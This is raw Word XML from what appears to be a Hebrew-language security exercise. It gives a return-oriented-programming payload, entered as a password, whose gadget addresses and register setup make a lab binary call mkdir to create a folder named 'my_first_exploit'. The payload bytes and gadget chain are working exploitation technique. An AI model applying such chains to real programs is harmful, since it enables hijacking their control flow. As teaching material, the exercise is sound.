        <w:bidi/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BA81356" w14:textId="684BC9D1" w:rsidR="002F5B87" w:rsidRDefault="00E961A0" w:rsidP="002F5B8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עת הרצת התוכנית, נכניס לסיסמה את המחרוזת הבאה</w:t>
      </w:r>
      <w:r w:rsidR="002F5B87">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0752C48C" w14:textId="335BE13A" w:rsidR="00376D44" w:rsidRDefault="00063B57" w:rsidP="0055366D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“my_first_expliot</w:t>
      </w:r>
      <w:r w:rsidR="00417D9A">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidR="00471711">
        <w:t>x0</w:t>
      </w:r>
      <w:r>
        <w:t>0\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3B3380" w14:textId="6BE73A1D" w:rsidR="00376D44" w:rsidRDefault="00063B57" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00235D05">
        <w:t>2c</w:t>
      </w:r>
      <w:r w:rsidR="00780F50">
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00235D05">
        <w:t>0e</w:t>
      </w:r>
      <w:r w:rsidR="00780F50">
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD62A6" w14:textId="630730A7" w:rsidR="00112430" w:rsidRDefault="00112430" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698B4244" w14:textId="4C0BE26C" w:rsidR="00376D44" w:rsidRDefault="00780F50" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="006E7468">
        <w:t>24\x06\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E87C29" w14:textId="62050232" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00CE327F">
        <w:t>2c</w:t>
      </w:r>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="00CE327F">
        <w:t>0e</w:t>
      </w:r>
      <w:r>
        <w:t>\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753227E1" w14:textId="369209A5" w:rsidR="00CE327F" w:rsidRDefault="00CE327F" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F08864E" w14:textId="5355DFA2" w:rsidR="00B07266" w:rsidRDefault="00B07266" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x24\x06\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20712365" w14:textId="1CD58A2D" w:rsidR="00D73C81" w:rsidRDefault="00D73C81" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47229566" w14:textId="41062DE4" w:rsidR="004D7DCE" w:rsidRDefault="004D7DCE" w:rsidP="004D7DCE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\xd</w:t>
      </w:r>
      <w:r w:rsidR="009B514B">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>\xff\xff\xff\xff\xff\xff\xff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CBDB5F" w14:textId="1D639EFB" w:rsidR="00CE4D60" w:rsidRDefault="00CE4D60" w:rsidP="00CE4D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\xbc\x08\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6D10A" w14:textId="62DC9C36" w:rsidR="00CE4D60" w:rsidRDefault="00CE4D60" w:rsidP="00CE4D60">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x1d\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74493D74" w14:textId="2EA42A6A" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x</w:t>
      </w:r>
      <w:r w:rsidR="005E4D96">
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:t>\x0</w:t>
      </w:r>
      <w:r w:rsidR="005E4D96">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFBF188" w14:textId="4A153804" w:rsidR="005B5F12" w:rsidRDefault="005B5F12" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180EA7CB" w14:textId="5FA42764" w:rsidR="00060628" w:rsidRDefault="00060628" w:rsidP="00060628">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x2c\x0e\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5172C846" w14:textId="0586121D" w:rsidR="00376D44" w:rsidRDefault="00836DAA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x53\x00\x00\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280508EC" w14:textId="7E9D89C7" w:rsidR="002B23E0" w:rsidRDefault="00D800EA" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>\x4f\x11\x40\x00\x00\x00\x00\x00</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BE7BA" w14:textId="4663DE39" w:rsidR="00376D44" w:rsidRDefault="00376D44" w:rsidP="00376D44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:jc w:val="right"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B780A79" w14:textId="28DC5B33" w:rsidR="009E09C6" w:rsidRDefault="002F5B87" w:rsidP="002F5B87">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:bidi/>
        <w:rPr>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>רעיון:</w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נרצה לשנות את ערכי הפרמטרים המועברים לקריאת מערכת כך שהיא תיצור את התיקייה הרצויה. לשם כך נכניס את הערכים הבאים: </w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve">rax = </w:t>
      </w:r>
      <w:r w:rsidR="006763C6">
        <w:t>83</w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:t>, rsi = 0755, rd</w:t>
      </w:r>
      <w:r w:rsidR="00F40055">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00575BEE">
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:t>adders on the stack of the new directory name</w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007B75F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>נעשה זאת בצעדים הבאים</w:t>
      </w:r>
      <w:r w:rsidR="007A40C8">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בעת קריאת הסיסמה</w:t>
      </w:r>
      <w:r w:rsidR="009E09C6">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E00C9" w14:textId="76847CD8" w:rsidR="000D00DC" w:rsidRDefault="00575BEE" w:rsidP="005A61AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:bidi/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">הכנסת שם התיקייה החדשה על המחסנית </w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:t>“my_first_exploit\0</w:t>
      </w:r>
      <w:r w:rsidR="0066774E" w:rsidRPr="007F4CA9">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="0066774E">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> + 7</w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> תווים כלשהם + הכתובת </w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r w:rsidR="000D00DC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, אליה נקפוץ אחרי קריאת הסיסמה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EDCFF0" w14:textId="7A61CCEA" w:rsidR="000D00DC" w:rsidRDefault="000D00DC" w:rsidP="000D00D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הכנסת הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שיעלה לתוך </w:t>
      </w:r>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בעת ביצוע </w:t>
      </w:r>
      <w:r>
        <w:t>pop rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ומשם לקפוץ לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> (שתוכנס לאחר הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> על המחסנית).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D94BED6" w14:textId="514968ED" w:rsidR="005A61AF" w:rsidRDefault="009224D3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ב-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 הפעולות הבאות, נתייחס ל-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>push %rbp</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אשר תשנה את </w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> הנוכחי ול-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>mov %rsp, %rbp</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אשר תעביר את </w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>rsp</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001D461C" w:rsidRPr="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>החדש</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:rtl/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בו שמורה </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">כתובת </w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>המחזרות שאנו רוצים בתור שם התיקייה</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, ל-</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:t>rbp</w:t>
      </w:r>
      <w:r w:rsidR="001D461C">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B595226" w14:textId="5C97EF5B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לאחר מכן, נקפוץ לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אשר תעביר את הערך הקודם של </w:t>
      </w:r>
      <w:r>
        <w:t>rbp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ל</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>r15-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> דרך </w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>pop r15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>, ו</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">את הערך של </w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>return value</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שנכנס ב-</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t xml:space="preserve"> call rax</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> נכניס ל-</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>di</w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> דרך </w:t>
      </w:r>
      <w:r w:rsidR="002161C2">
        <w:t>pop r</w:t>
      </w:r>
      <w:r w:rsidR="000149C1">
        <w:t>di</w:t>
      </w:r>
      <w:r w:rsidR="002161C2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ז נחזור שוב לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="00AB7B44">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79097DFC" w14:textId="1A3B0AE8" w:rsidR="00AB7B44" w:rsidRDefault="00AB7B44" w:rsidP="00AB7B44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ערך </w:t>
      </w:r>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות הכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אליה נעבור אחרי הקפיצה שתתבצע בכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x400624</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> בה נבצע את הפקודות הבאות:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102E9ED0" w14:textId="07F746AD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כאשר נעשה שוב </w:t>
      </w:r>
      <w:r>
        <w:t>push %rbp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">, הערך שיכנס הוא הכתובת של המחזרות הרצויה. משם נקפוץ שוב לכתובת </w:t>
      </w:r>
      <w:r>
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00E81736">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> שכבר מאותחל ב-</w:t>
      </w:r>
      <w:r w:rsidR="00E81736">
        <w:t>rax</w:t>
      </w:r>
      <w:r w:rsidR="00E81736">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEDE569" w14:textId="4AA527B2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נבצע </w:t>
      </w:r>
      <w:r>
        <w:t>pop %r</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובכך נ</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">קבל ב- </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00257878">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidR="003E5385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הכתובת של המחזרות </w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="003E5385">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA8E8BC" w14:textId="3745D8F9" w:rsidR="008F66F3" w:rsidRDefault="001D461C" w:rsidP="008F66F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משם נקפוץ </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">עם </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>ret</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>0x401d1</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונכניס ב-</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00B97BA5">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את הערך </w:t>
      </w:r>
      <w:r w:rsidR="002B5C39">
        <w:t>=0xffffff</w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="009B514B">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00651CA4">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>40</w:t>
      </w:r>
      <w:r w:rsidR="002B5C39">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">. משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="007D7856">
        <w:t>0x4008bc</w:t>
      </w:r>
      <w:r w:rsidR="008F66F3">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F548AA1" w14:textId="2016E7E2" w:rsidR="007D7856" w:rsidRDefault="007D7856" w:rsidP="007D785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כתובת זה תתבצע הפקודה </w:t>
      </w:r>
      <w:r>
        <w:t>add %r15, %rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובכך נקבל ב-</w:t>
      </w:r>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> את כתובת המחזורת הרצויה.</w:t>
      </w:r>
      <w:r w:rsidR="00D20923">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D20923">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="001B2D1B">
        <w:t>0x401d11</w:t>
      </w:r>
      <w:r w:rsidR="00D20923">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CA7C34" w14:textId="2E342742" w:rsidR="001B2D1B" w:rsidRDefault="001B2D1B" w:rsidP="001B2D1B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</w:t>
      </w:r>
      <w:r>
        <w:t>rsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> להיות </w:t>
      </w:r>
      <w:r>
        <w:t>0755=0x1ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונכניס ל-</w:t>
      </w:r>
      <w:r>
        <w:t>r15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ערך זבל.</w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> משם נקפוץ לכתובת </w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:t>0x400e2c</w:t>
      </w:r>
      <w:r w:rsidR="001021CC">
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
